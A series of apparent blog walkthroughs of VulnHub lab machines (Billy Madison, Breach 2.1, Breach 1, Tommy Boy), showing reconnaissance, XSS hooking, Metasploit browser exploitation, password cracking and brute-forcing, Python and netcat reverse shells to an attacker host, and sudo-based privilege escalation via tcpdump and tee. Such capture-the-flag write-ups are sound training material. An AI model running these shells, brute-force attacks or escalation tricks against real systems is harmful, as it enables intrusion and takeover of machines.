https://en.wikipedia.org/wiki/Billy_Madison

-EG

Now I copied the BowelMovement file to /tmp then I download it locally with Eric’s account. Seems to be a TrueCrypt volume (“That truely cracks me up!”) so, first of all I create the custom dictionary file with CeWL:

cewl -d 0 -w wordlist.txt https://en.wikipedia.org/wiki/Billy_Madison

Now crack the volume with truecrack:

truecrack -t BowelMovement -w wordlist.txt

After some minutes I discovered the password which is execrable, now I need to mount the volume:

truecrypt --mount BowelMovement

Now unzip secret.zip:

unzip secret.zip

And you will find the .doc file and THE-END.txt. Open the second file and we have completed the VM!

[VULNHUB] Billy Madison: 1.1

[VULNHUB] Breach: 2.1

With this awesome Boot2Root VM I learned lot of stuff about XSS, Client-Side Attack and Privilege Escalation too. Let’s start.

PART ONE

I always start with an nmap scan:

nmap 192.168.110.151 -sV

This is the output:

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-08-22 15:02 CEST
Nmap scan report for 192.168.110.151
Host is up (0.0034s latency).
Not shown: 999 closed ports
PORT    STATE SERVICE VERSION
111/tcp open  rpcbind 2-4 (RPC #100000)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.70 seconds

OK, something went wrong, then I retried the command with a full range port scan:

nmap -sV -p 1-65535 192.168.110.151

Now it is more interesting:

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-08-22 15:05 CEST
Nmap scan report for 192.168.110.151
Host is up (0.012s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE VERSION
111/tcp   open  rpcbind 2-4 (RPC #100000)
57477/tcp open  status  1 (RPC #100024)
65535/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u2 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.09 seconds

There is only an SSH server to analyze. So I tried to log in:

ssh 192.168.110.151 -p 65535

And a banner appeared:

#############################################################################
#                  Welcome to Initech Cyber Consulting, LLC                 #
#            All connections are monitored and recorded                #
#                Unauthorized access is encouraged                     #
#        Peter, if that's you - the password is in the source.         #
#          Also, stop checking your blog all day and enjoy your vacation!   # 
#############################################################################

I collected an username (peter) but I had to find the password which is “in the source”. I lost 2 days finding this password when at the end I guessed it: “inthesource”. So I connected to SSH again with peter as username:

ssh peter@192.168.110.151 -p 65535

I used inthesource as password and I couldn’t believe that it worked. Unfortunatelly I got an error after using this password:

Connection to 192.168.110.151 closed.

That was strange, so I retried an nmap scan:

nmap -sV -p 1-65535 192.168.110.151

And I found that the port 80 was open:

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-08-22 15:11 CEST
Nmap scan report for 192.168.110.151
Host is up (0.012s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
111/tcp   open  rpcbind 2-4 (RPC #100000)
57477/tcp open  status  1 (RPC #100024)
65535/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u2 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.23 seconds

OK, I visited http://192.168.110.151 and only a welcome page appeared. Looking into the source code I found this:

<!--I like hints! Here at Initech we don't trust our users and either should you!--<
<!--I'm not just going to stick creds here, really, I'm not. Sorry-->

Really useful! 😉
I rechecked the SSH banner and I noticed that it talks about a blog, maybe there is a subdirectory to find. I could use dirbuster but I just guessed the URL: http://192.168.110.151/blog. It is a simple blog and after some research I found a persistent XSS at register page. So I used Beef Framework to hook a possible victim browser:

sudo beef-xss -x

Type ” into the username input field at register page followed by a script with http://192.168.110.2:3000/hook.js as src parameter. After some minutes the victim browser was hooked. I tried to run some commands from Beef without success, so I took a look at the User-Agent:

Mozilla/5.0 (X11; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0

Our victim, who is Peter, is using Firefox 15 which is vulnerable. So I fired up Metasploit:

sudo msfconsole
use exploit/multi/browser/firefox_proto_crfmrequest
set PAYLOAD firefox/shell_reverse_tcp
set SRVHOST 192.168.110.2
set URIPATH shell
set LHOST 192.168.110.2
exploit

Then I went to register page again and I typed this into the iframe src parameter after the “:

http://192.168.110.2/shell

After some minutes I got a shell into Metasploit and I upgraded it to a meterpreter one:

sessions -u 0

Now I invoked the Unix shell:

shell

And I got TTY:

python -c 'import pty; pty.spawn("/bin/bash")'

Now I was logged in as peter. I browsed to /home directory and I collected two new usernames:
milton
bill

PART TWO

I moved to /tmp folder and I downloaded LinEnum. I gave it execution permissions:

chmod +x LinEnum.sh

And I ran it:

./LinEnum.sh

I discovered that there was a MySQL server accessible with root as username without the password. So I connected to it:

mysql -h 127.0.0.1 -u root

First of all I listed the databases:

SHOW databases;

This is the output:

+--------------------+
| Database           |
+--------------------+
| information_schema |
| blog               |
| mysql              |
| oscommerce         |
| performance_schema |
+--------------------+
5 rows in set (0.03 sec)

Then I looked for oscommerce:

USE oscommerce;
SHOW tables;
SELECT * FROM osc_administrators;

And this is the table content:

+----+-----------+-------------------------------------+
| id | user_name | user_password                       |
+----+-----------+-------------------------------------+
|  1 | admin     | 685cef95aa31989f2edae5e055ffd2c9:32 |
+----+-----------+-------------------------------------+

The password seems to be an MD5 one, so I browsed to CrackStation and I pasted the hashed password without the :32. I discovered that the password was 32admin which is a little strange, maybe the 32 is the salt so the real password is just admin. Looking again into LinEnum output I saw that the VM is listening on 2323 port, so I just connected to it with telnet:

telnet 127.0.0.1 2323

I found some coordinates and a login prompt appeared:

29 45'46" N 95 22'59" W

Looking with Google Maps I discovered that theese coordinates are locating at Houston Police Department Memorial. I need an username to login, I tried milton but a password prompt appears, I tried with Houston and it worked but immediately a countdown showed up (3…2…1…) and there was a question to answer:

Whose stapler is it?

Of course, it’s mine! So I used mine as password and I got the shell as milton. Looking around I discovered that into /var/www folder there was an html2 one which contained another folder: oscommerce. At this point there was nothing to do, so I tried a rescan with nmap:

nmap -sV -p 1-65535 192.168.110.151

Magically a new HTTP port was open: 8888. I browsed to http://192.168.110.151:8888 which has directory listing enabled. I clicked on /oscommerce and the site shows up. I went to http://192.168.110.151:8888/oscommerce/admin and I used admin:admin credentials to login. Now I need to find an upload form and I discovered a File Manager under Tools tab. Unfortunatelly I couldn’t upload nothing into the webserver root directory so I found a writable folder: includes/work. I uploaded b374k PHP shell and I typed this into Terminal tab:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.110.2",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

But before press ENTER I started listen locally:

sudo nc -lvp 1234

Now I got the shell and I am logged as blumbergh. Now I tried to escalate privileges.

PART THREE

 

sudo -l

I discovered that this user can execute tcpdump as root and also I know that tcpdump has postrotate command. So I switched to /tmp and I typed:

echo "nc 192.168.110.2 1235 -e /bin/bash" > shell.sh

Give +x permission:

chmod +x shell.sh

Then I started to listen locally:

sudo nc -lvp 1235

Then I executed the following command:

sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/shell.sh -Z root

Got the shell as root! Then I browsed to /root and I listed the files:

ls -al

Gave +x permission to .flag.py and execute it:

./.flag.py

VM completed!

[VULNHUB] Breach: 2.1

[VULNHUB] Breach 1

This is the first VM of a series. It was really interesting and funny!

PART ONE

First of all I performed an nmap scan but I don’t write here the output because there are 65389 ports open; by the way that was really really strange. There is a port 80 open, so I checked if there was a website running on the VM, so I browsed to http://192.168.110.140 and the website appeared. Looking into the page source I discovered this:

<!------ Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo ----->

Seems to be a base64 encoded string so I decoded it and that was the result:

cGdpYmJvbnM6ZGFtbml0ZmVlbCRnb29kdG9iZWFnYW5nJHRh

Another base64 encoded string, I re-decoded it and finally I found something interesting:

pgibbons:damnitfeel$goodtobeagang$ta

An username and a password, maybe they will be useful later. Before go further I tried to scan the website with dirbuster to find some directories and I find the /images one which conatains several images. I downloaded all of them and I checked with exiftool if they had some interesting informations. I discovered that the image bill.png contains coffeestains as a comment. Ok, now I can click on the image at the center of the website page and I will be redirected into another page where I can access the Employeer Portal. Now I need to login and I tried the string recovered into the source page and it worked!

PART TWO

The next step is to analyze the portal. First of all I noticed that there are 3 unread messages into the user inbox so I read it. The first one was sent by the admin who says that all sensitive informations should be posted into the admin portal. The second and the third one talk about the purchase of IDS/IPS system and I found a link for the keystore: http://192.168.110.140/.keystore. I downloaded it because it is really important. Now I switched to “View Account” section and I discovered a comment by this user (Peter Gibbsons), the title of the content is: “SSL implementation test capture”. I found a link for a .pcap file: http://192.168.110.140/impresscms/_SSL_test_phase1.pcap, so I downloaded it. AN useful information into the comment is that:

They told me the alias, storepassword and keypassword are all set to 'tomcat'.

Do you remember the .keystore file? I can extract the private key from it and I can decrypt the traffic. So I use this command to extract the private key:

keytool -importkeystore -srckeystore keystore -destkeystore key.p12 -deststoretype PKCS12 -srcalias tomcat

Now you need to type the destination file password (I used tomcat again) and the source keystore password (which is tomcat) and you will get the private key file. Now open wireshark, go to Settings and under Protocols select SSL. Now click Edit… near RSA key list and press the + and fill the input fields: into IP type 192.168.110.140, into Port type 8443, into Protocol type http, into Key File you need to import the extracted private key and into the Password type tomcat. Press OK and import the .pcap file. If all is correct you should able to see the Client Hello string. Right click on it and follow the SSL stream. I discovered that an user tried to login into /_M@nag3Me/html and used tomcat:Tt\5D8F(#!*u=G)4m7zB as username and password. I decoded the string from Basic Authentication into the GET request. So just try to login: browse to https://192.168.110.140:8443/_M@nag3Me/html and use the username and password discovered before. Now I am logged into the tomcat server.

PART THREE

Now it’s time to get a shell. I can simply deploy a .war file (I used the laudanum one). Once I uploaded the cmd.war file I browsed to https://192.168.110.140:8443/_M@nag3Me/cmd/cmd.jsp. Now I started to listen locally:

sudo nc -lvp 1234

Then I executed the following command into the tomcat server:
nc 192.168.110.2 1234 -e /bin/bash

The I got a bind shell but I need TTY:

python -c 'import pty; pty.spawn("/bin/bash")'

Perfect, now I started to analyze the server. First of all I browsed to /home to see which usernames are available: blumbergh and milton. Do you remember the comment which I found into an image with exiftool? Maybe it can be a password of one of these users. So I tried to login as blumbergh and I used coffeestains as password and it worked! Now I need to escalated my privileges. First of all I checked what the user can run as root:

sudo -l

This is the output:

(root) NOPASSWD: /usr/bin/tee /usr/share/cleanup/tidyup.sh

Let’s check what tidyup.sh is:

cat /usr/share/cleanup/tidyup.sh

This is the important part:

#This script is set to run every 3 minutes as an additional defense measure against hackers.

So I can create a temporary file with bind shell inside, cat it into the shell and use tee to write into the .sh script. So let’s create the file:

echo "nc 192.168.110.2 1235 -e /bin/bash" > /tmp/shell

And perform the trick:

cat /tmp/shell | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh

Now listen locally:

sudo nc -lvp 1235

And wait for the shell. Once you got it browse to /root and list the files:

ls -al

There is a .flag.txt file, just cat it:

cat .flag.txt

VM rooted and completed!

[VULNHUB] Breach 1

[VULNHUB] Tommy Boy: 1

Tommy Boy is an awesome VulnHub VM with an awesome story inside. The objective of this machine is to restore a backup of a website, The Callahan Auto company and collect 5 flags to unlock a final message. Let’s start!

FLAG 1

First of all scan the website IP with nmap:

nmap 192.168.1.15 -A

This is the output:

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-08-02 15:13 CEST
Nmap scan report for 192.168.1.15
Host is up (0.0027s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a0:ca:62:ce:f6:7e:ae:8b:62:de:0b:db:21:3f:b0:d6 (RSA)
|_  256 46:6d:4b:4b:02:86:89:27:28:5c:1d:87:10:55:3d:59 (ECDSA)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 4 disallowed entries 
| /6packsofb...soda /lukeiamyourfather 
|_/lookalivelowbridge /flag-numero-uno.txt
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome to Callahan Auto
8008/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: KEEP OUT
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.79 seconds

There are 3 services running on the machine, 2 website and an ssh. Open 192.168.1.15 on the browser and you will see an error message saying that I need to restore the backup of the website. Analyzing the source code of the page I notice this:

<!--Comment from Nick: backup copy is in Big Tom's home folder-->
<!--Comment from Richard: can you give me access too? Big Tom's the only one w/password-->
<!--Comment from Nick: Yeah yeah, my processor can only handle one command at a time-->
<!--Comment from Richard: please, I'll ask nicely-->
<!--Comment from Nick: I will set you up with admin access *if* you tell Tom to stop storing important information in the company blog-->
<!--Comment from Richard: Deal.  Where's the blog again?-->
<!--Comment from Nick: Seriously? You losers are hopeless. We hid it in a folder named after the place you noticed after you and Tom Jr. had your big fight. You know, where you cracked him over the head with a board. It's here if you don't remember: https://www.youtube.com/watch?v=VUxOd4CszJ8--> 
<!--Comment from Richard: Ah! How could I forget?  Thanks-->

There is an hidden blog of the company stored into an hidden folder which name should be guessed watching the YouTube video linked into the comments. The video is just a phrase “Hey Prehistoric Forest”, so try to open /prehistoricforest. It works, we are into the company blog! Before analyzing it, open /robots.txt which has interesting entries as nmap said:

User-agent: *
Disallow: /6packsofb...soda
Disallow: /lukeiamyourfather
Disallow: /lookalivelowbridge
Disallow: /flag-numero-uno.txt

There are 3 folder which contain some images which I can ignore and a .txt file, the first flag. Just browse to /flag-numero-uno.txt, the first flag is: B34rcl4ws. Now we can analyze the blog.

Flag 2

Open the blog again and start read the posts. There is a message by richard which is protected by a password that I need to find. The latest post on the blog it’s a request by Tom Jr. asking to richard the password of the post and there is a comment, read it:

Hey numbnuts, look at the /richard folder on this server. I’m sure that picture will jog your memory.

Since you have a small brain: see up top in the address bar thingy? Erase “/prehistoricforest” and put “/richard” there instead.

So let’s navigate to /richard and download the image shockedrichard.jpg. I am pretty sure that the password is hidden into the image comment, I used exiftool to extract it:

./exiftool shockedrichard.jpg

This is the output:

ExifTool Version Number         : 10.24
File Name                       : shockedrichard.jpg
Directory                       : /home/cristiano/Scaricati
File Size                       : 163 kB
File Modification Date/Time     : 2016:08:01 00:15:25+02:00
File Access Date/Time           : 2016:08:01 00:16:30+02:00
File Inode Change Date/Time     : 2016:08:01 00:15:25+02:00
File Permissions                : rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : None
X Resolution                    : 1
Y Resolution                    : 1
Exif Byte Order                 : Little-endian (Intel, II)
Software                        : Google
Copyright                       : Copyright © 1995 Paramount Pictures Corporation. Credit: © 1995 Paramount Pictures / Courtesy: Pyxurz.
Exif Version                    : 0220
User Comment                    : ce154b5a8e59c89732bc25d6a2e6b90b
Exif Image Width                : 1600
Exif Image Height               : 1029
XMP Toolkit                     : Image::ExifTool 9.97
Rights                          : Copyright © 1995 Paramount Pictures Corporation. Credit: © 1995 Paramount Pictures / Courtesy: Pyxurz.
Creator Tool                    : Google
Profile CMM Type                : Lino
Profile Version                 : 2.1.0
Profile Class                   : Display Device Profile
Color Space Data                : RGB
Profile Connection Space        : XYZ
Profile Date Time               : 1998:02:09 06:49:00
Profile File Signature          : acsp
Primary Platform                : Microsoft Corporation
CMM Flags                       : Not Embedded, Independent
Device Manufacturer             : IEC
Device Model                    : sRGB
Device Attributes               : Reflective, Glossy, Positive, Color
Rendering Intent                : Media-Relative Colorimetric
Connection Space Illuminant     : 0.9642 1 0.82491
Profile Creator                 : HP
Profile ID                      : 0
Profile Copyright               : Copyright (c) 1998 Hewlett-Packard Company
Profile Description             : sRGB IEC61966-2.1
Media White Point               : 0.95045 1 1.08905
Media Black Point               : 0 0 0
Red Matrix Column               : 0.43607 0.22249 0.01392
Green Matrix Column             : 0.38515 0.71687 0.09708
Blue Matrix Column              : 0.14307 0.06061 0.7141
Device Mfg Desc                 : IEC http://www.iec.ch
Device Model Desc               : IEC 61966-2.1 Default RGB colour space - sRGB
Viewing Cond Desc               : Reference Viewing Condition in IEC61966-2.1
Viewing Cond Illuminant         : 19.6445 20.3718 16.8089
Viewing Cond Surround           : 3.92889 4.07439 3.36179
Viewing Cond Illuminant Type    : D50
Luminance                       : 76.03647 80 87.12462
Measurement Observer            : CIE 1931
Measurement Backing             : 0 0 0
Measurement Geometry            : Unknown
Measurement Flare               : 0.999%
Measurement Illuminant          : D65
Technology                      : Cathode Ray Tube Display
Red Tone Reproduction Curve     : (Binary data 2060 bytes, use -b option to extract)
Green Tone Reproduction Curve   : (Binary data 2060 bytes, use -b option to extract)
Blue Tone Reproduction Curve    : (Binary data 2060 bytes, use -b option to extract)
Current IPTC Digest             : adfc7551120fa16884c295b6d397931f
Envelope Record Version         : 4
Coded Character Set             : UTF8
Application Record Version      : 4
Copyright Notice                : Copyright © 1995 Paramount Pictures Corporation. Credit: © 1995 Paramount Pictures / Courtesy: Pyxurz.
IPTC Digest                     : adfc7551120fa16884c295b6d397931f
Image Width                     : 1600
Image Height                    : 1029
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 1600x1029
Megapixels                      : 1.6

The image comment is:

ce154b5a8e59c89732bc25d6a2e6b90b

Seems to be an MD5 hash, decrypt it with HashKiller and you will find the post password: spanky. Now we can read the post; in a few words we need to restore the backup of the website renaming callahanbak.bak, which is located into Big Tom SSH account, to index.html. The SSH user name of Tom is into the list of WordPress users but I don’t have his password. Also there is an FTP service running on the machine listening onto a different default port (21), and this service it’s unstable: every 15 minutes it goes up and down. The FTP user name of richard is nickburns but I need to find the password which seems to be very easy to guess.
Let’s finish to analyze the remaining posts, notice the first post made into this blog, open the comment:

Well put boss 😉

Flag #2: thisisthesecondflagyayyou.txt

Navigate to /prehistoricforest/thisisthesecondflagyayyou.txt and collect the second flag: Z4l1nsky. Now I can go further.

Flag 3

I focus myself to the FTP, so I rescan the IP with the maximum range of ports:

nmap 192.168.1.15 -p 1-65535

And now a wild port appears:

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-08-02 15:41 CEST
Nmap scan report for 192.168.1.15
Host is up (0.029s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
8008/tcp  open  http
65534/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 9.62 seconds

Open ftp command shell and type:

open 192.168.1.15 65534

Now i use nickburns as user name but I need to guess the password which can be egual to user name, so try nickburns as password. Now I am logged into the FTP server, list the file and you will see a readme.txt. Download it:

get readme.txt

Close ftp shell and read the file:

cat readme.txt

There is a message from Nick who says that there is a /NickIzL33t subfolder somewhere in the server where there is an encrypted .zip which contains all Big Tom’s passwords. Also Nick says that I can use that folder as a Dropbox to access my files from the phone. There are no subfolder into 192.168.1.15 but there is another http service which is listening on port 8008, so navigate to 192.168.1.15:8008 and you will see a simple HTML Nick page. Browse to /NickIzL33t and another Nick HTML page appears but seems to be nothing. So I try to change my User-Agent to a mobile device (iOS) with Burpsuite as proxy and when I refreshed the page, it changed! There is a message which says:

Gotta know the EXACT name of the .html to break into this fortress.

So it’s time to do a bruteforce attack. I captured the GET request of the website
with Burpsuite refreshing the page, then I sent it to the Intruder with the following payload:

GET /NickIzL33t/§page§.html HTTP/1.1
Host: 192.168.1.15:8008
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
If-Modified-Since: Fri, 15 Jul 2016 02:11:27 GMT
If-None-Match: "10e-537a322dc0ba6-gzip"
Cache-Control: max-age=0

I used rockyou.txt as wordlist and I started the attack. After some minutes I found fallon1.html as an HTML page with response code 200. So I navigate to /NickIzL33t/fallon1.html and the famous page shows up.
I found an hint:

Big Tom,

Your password vault is protected with (yep, you guessed it) a PASSWORD!  
And because you were choosing stupidiculous passwords like "password123" and "brakepad" I
enforced new password requirements on you...13 characters baby! MUAHAHAHAHAH!!!

Your password is your wife's nickname "bev" (note it's all lowercase) plus the following:

* One uppercase character
* Two numbers
* Two lowercase characters
* One symbol
* The year Tommy Boy came out in theaters

Yeah, fat man, that's a lot of keys to push but make sure you type them altogether in one 
big chunk ok?  Heh, "big chunk."  A big chunk typing big chunks.  That's funny.

LOL

-Nick

The 3rd flag: TinyHead and the encrypted .zip file.

Flag 4

Now I need to decrypt the .<ip file which is protected by a password. Fortunately the password has a pattern, so I use crunch to create a custom wordlist:

crunch 13 13 -t bev,%%@@^1995 -o wordlist.txt

Now to decrypt the zip I use fcrackzip:

fcrackzip -u -v -D -p wordlist.txt t0msp4ssw0rdz.zip

After some minutes I found the password: bevH00tr$1995

Unzip the file and open passwords.txt. Interesting section:

Callahan Auto Server
----------------------------
Username: bigtommysenior
Password: fatguyinalittlecoat

Note: after the "fatguyinalittlecoat" part there are some numbers, but I don't remember what they are.
However, I wrote myself a draft on the company blog with that information.

Callahan Company Blog
----------------------------
Username: bigtom(I think?)
Password: ??? 
Note: Whenever I ask Nick what the password is, he starts singing that famous Queen song.

To find SSH password I need to break into WordPress blog but Big Tom seems to don’t remember his username, I use wpscan to enumerate users:

sudo wpscan -u 192.168.1.15/prehistoricforest --enumerate u

The output:

+----+----------+-------------------+
| Id | Login    | Name              |
+----+----------+-------------------+
| 1  | richard  | richard           |
| 2  | tom      | Big Tom           |
| 3  | tommy    | Tom Jr.           |
| 4  | michelle | Michelle Michelle |
+----+----------+-------------------+

So Big Tom username is tom but I need to find the password. The hint is a famous Queen song but I think it refers to rockyou.txt wordlist. So I used Burpsuite to bruteforce the login credentials. I intercepted the POST request from /wp-admin with the proxy then I sent to the Intruder the following payload:

POST /prehistoricforest/wp-login.php HTTP/1.1
Host: 192.168.1.15
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.15/prehistoricforest/wp-login.php
Cookie: wp-postpass_3604ebf3b5bc65ba9e61d2ca579e65ae=%24P%24B137jyM8khyXYMZ82AEpHgB2Mv9OKi.; wp-settings-time-2=1470085172; wordpress_test_cookie=WP+Cookie+check
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 122

log=tom&pwd=§password§&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.1.15%2Fprehistoricforest%2Fwp-admin%2F&testcookie=1

I waited some minutes, then I found the login password of tom: tomtom1. It’s time to login. Open Big Tom draft:

Ok so Nick always yells at me for forgetting the second part of my "ess ess eight (ache? H?) password so I'm writing it here:

1938!!

Nick, if you're reading this, I DON'T CARE IF I"M USING THIS THING AS A PASSWORD VAULT. YOU TOOK AWAY MY STICKIES SO I"LL PUT MY PASSWORDS ANY DANG PLACE I WANT.

So SSH user name of Big Tom is bigtommysenior and the password is fatguyinalittlecoat1938!!. Login with SSH:

ssh bigtommysenior@192.168.1.15

Insert the password and voilà, I am logged into the SSH. List files and you will notice the 4th flag which is EditButton and the backup file. Restore it:

cp callahanbak.bak /var/www/html/index.html

Navigating with your browser to /index.html you will see the home page of the website. Now we need to find the latest flag which is, according to the 4th one, in the root of this server at /5.txt.

Flag 5

Navigating to root directory and listing the file I see that I can’t read .5.txt, only the user www-data can do this, so I need to escalate privileges. Let’s check some directories with special permissions:

find / -perm -2 -type d 2>/dev/null

And an interesting one is showed:

/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads

Browse to /NickIzL33t/P4TCH_4D4MS (remember to change the User-Agent) and an upload form appears. Upload a PHP reverse shell as .jpg then rename the file into .php, in fact we have the access to /uploads folder into SSH. Listen locally for the incoming connection:

nc -lvp 1234

Then open /NickIzL33t/P4TCH_4D4MS/uploads/php-reverse-shell.php and the shell will be spawned into your local terminal. Just get the latest flag:

cat .5.txt

Which is: Buttcrack. Now return to the SSH shell, into BIg Tom home folder and unzip LOOT.ZIP. It will require a password which is all the flag putted together: B34rcl4wsZ4l1nskyTinyHeadEditButtonButtcrack. THE-END.txt file will be extracted. Read it. VM is completely pwned!

[VULNHUB] Tommy Boy: 1